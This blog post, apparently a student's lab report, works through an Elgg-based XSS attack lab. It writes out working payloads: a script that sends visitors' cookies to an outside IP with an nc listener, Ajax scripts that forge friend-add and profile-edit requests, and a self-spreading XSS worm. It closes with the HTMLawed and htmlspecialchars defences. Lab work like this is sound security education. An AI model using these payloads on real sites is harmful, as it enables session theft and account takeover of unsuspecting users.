menu 绝望的肉
[实验报告]XSS的靶场
7475 浏览 | 2020-11-24 | 阅读时间: 约 0 分钟 | 分类: 安全 | 标签:
请注意,本文编写于 307 天前,最后修改于 307 天前,其中某些信息可能已经过时。

Cross-Site Scripting (XSS) Attack Lab

Q1:

Insert malicious JS code into body profile<img src=1 onerror=confirm(document.cookie)>

Use admin to access Boby's profile. You can see that the cookie of admin has been output.

http://ec2-3-84-6-48.compute-1.amazonaws.com/profile/Boby

Using F12 to view the network interface, it can be seen that the cookie is indeed admin.

Q2:

In order to receive cookies from other users, we need to use another server to listen on a port.

We add xss payload to alice’s profile, and then let the admin visit alice’s personal homepage

Payload:

<script>document.write('<img src="http://47.114.179.29:5555/?c='+document.cookie+'"/>');</script>

Before doing this , you need to enter this command on the VPS.

nc -lvvp 5555

You can see that the user cookie is received.

Q3

Adding malicious code at Samy's profile.

<script type="text/javascript">
window.onload = function () {
var Ajax=null;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the HTTP request to add Samy as a friend.
var sendurl="http://ec2-3-84-6-48.compute-1.amazonaws.com/action/friends/add?friend=47"+ts+token; //FILL IN
//Create and send Ajax request to add friend
Ajax=new XMLHttpRequest();
Ajax.open("GET",sendurl,true);
Ajax.setRequestHeader("Host","http://ec2-3-84-6-48.compute-1.amazonaws.com");
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
Ajax.send();
}
</script>

Using other users to access Samy's page triggers code.View the sent requests through the network interface of F12.

As shown in the picture, friends have been added

Q4

Observe normal request packets,__elgg_ts and __elgg_token parameters obtained by the server through GET.

var ts="&__elgg_ts="+elgg.security.token.__elgg_ts

var token="&__elgg_token="+elgg.security.token.__elgg_token

Obtain the parameter value of the user who accesses this interface through these two commands.

At the same time, the format of GET parameters is also constructed.

Q5

I think XSS attacks can‘t be carried out.

Adding code in Editor Mode will add some HTML tags by default.And it can be seen that a large number of characters have been encoded.But using Text Mode to submit directly can upload complete malicious code.()

Q6

if(elgg.session.user.guid!= samyGuid)

By default, the personal homepage will be visited after the save is completed, and the saved malicious code will also be triggered.Prevent malicious code from executing on itself.Prevent malicious code from being directly overwritten

Q7

<script type="text/javascript">
window.onload = function(){
//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
//and Security Token __elgg_token
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the content of your url.
var content=token+ts+"&name="+userName+"&description=Hacked+by+hacker1&accesslevel%5Bdescription%5D=2&briefdescription=&accesslevel%5Bbriefdescription%5D=2&location=&accesslevel%5Blocation%5D=2&interests=&accesslevel%5Binterests%5D=2&skills=&accesslevel%5Bskills%5D=2&contactemail=&accesslevel%5Bcontactemail%5D=2&phone=&accesslevel%5Bphone%5D=2&mobile=&accesslevel%5Bmobile%5D=2&website=&accesslevel%5Bwebsite%5D=2&twitter=&accesslevel%5Btwitter%5D=2"+guid; //FILL IN
var sendurl="http://ec2-3-84-6-48.compute-1.amazonaws.com/action/profile/edit"; //FILL IN
var samyGuid=47; //FILL IN

//Create and send Ajax request to modify profile
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","ec2-3-84-6-48.compute-1.amazonaws.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);

}
</script>

Return after saving, and trigger malicious code at the same time.

The malicious code has been covered

Q8

Combine it with the code in the previous topic into a code.

<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>"; 
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        //Construct the content of your url.
        var content=token+ts+"&name="+userName+"&description=hacked+by"+ wormCode + "</p>&accesslevel%5Bdescription%5D=2&briefdescription=&accesslevel%5Bbriefdescription%5D=2&location=&accesslevel%5Blocation%5D=2&interests=&accesslevel%5Binterests%5D=2&skills=&accesslevel%5Bskills%5D=2&contactemail=&accesslevel%5Bcontactemail%5D=2&phone=&accesslevel%5Bphone%5D=2&mobile=&accesslevel%5Bmobile%5D=2&website=&accesslevel%5Bwebsite%5D=2&twitter=&accesslevel%5Btwitter%5D=2"+guid; //FILL IN
        var sendurl="http://ec2-3-84-6-48.compute-1.amazonaws.com/action/profile/edit"; //FILL IN
        var samyGuid=47; //FILL IN
        if(elgg.session.user.guid!=samyGuid)
        {
        //Create and send Ajax request to modify profile
        var Ajax=null;
        Ajax=new XMLHttpRequest();
        Ajax.open("POST",sendurl,true);
        Ajax.setRequestHeader("Host","ec2-3-84-6-48.compute-1.amazonaws.com");
        Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        Ajax.send(content);
        }
}
</script>

When admin visits Samy's home page, it can be seen that malicious code has been written to the admin page

At this time, Boby visits the home page of admin, and it can be seen that the worm XSS has started to spread.

Q9

Start this plugin

Account->administration->plugin

Visit Samy's home page to see that the malicious code in it has been materialized.At the same time, it can be observed that there are a lot of HTML tags missing.Like <scriptid=worm>

Using SSH to connect to the virtual machine, you can find the source code of htmlawed in this directory.

/var/www/XSS/Elgg/mod/htmlawed

The following is part of the source code.

It filters and removes most of the dangerous tags to defend against XSS attacks.

Q10

Remove related comments to start htmlspecialchars.

htmlspecialchars() is a function that comes with PHP, which converts predefined characters into HTML entities.

Even if it looks like normal code, it's actually materialized.

知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议

发表评论

email
web

全部评论 (暂无评论)

info 还没有任何评论,你来说两句呐!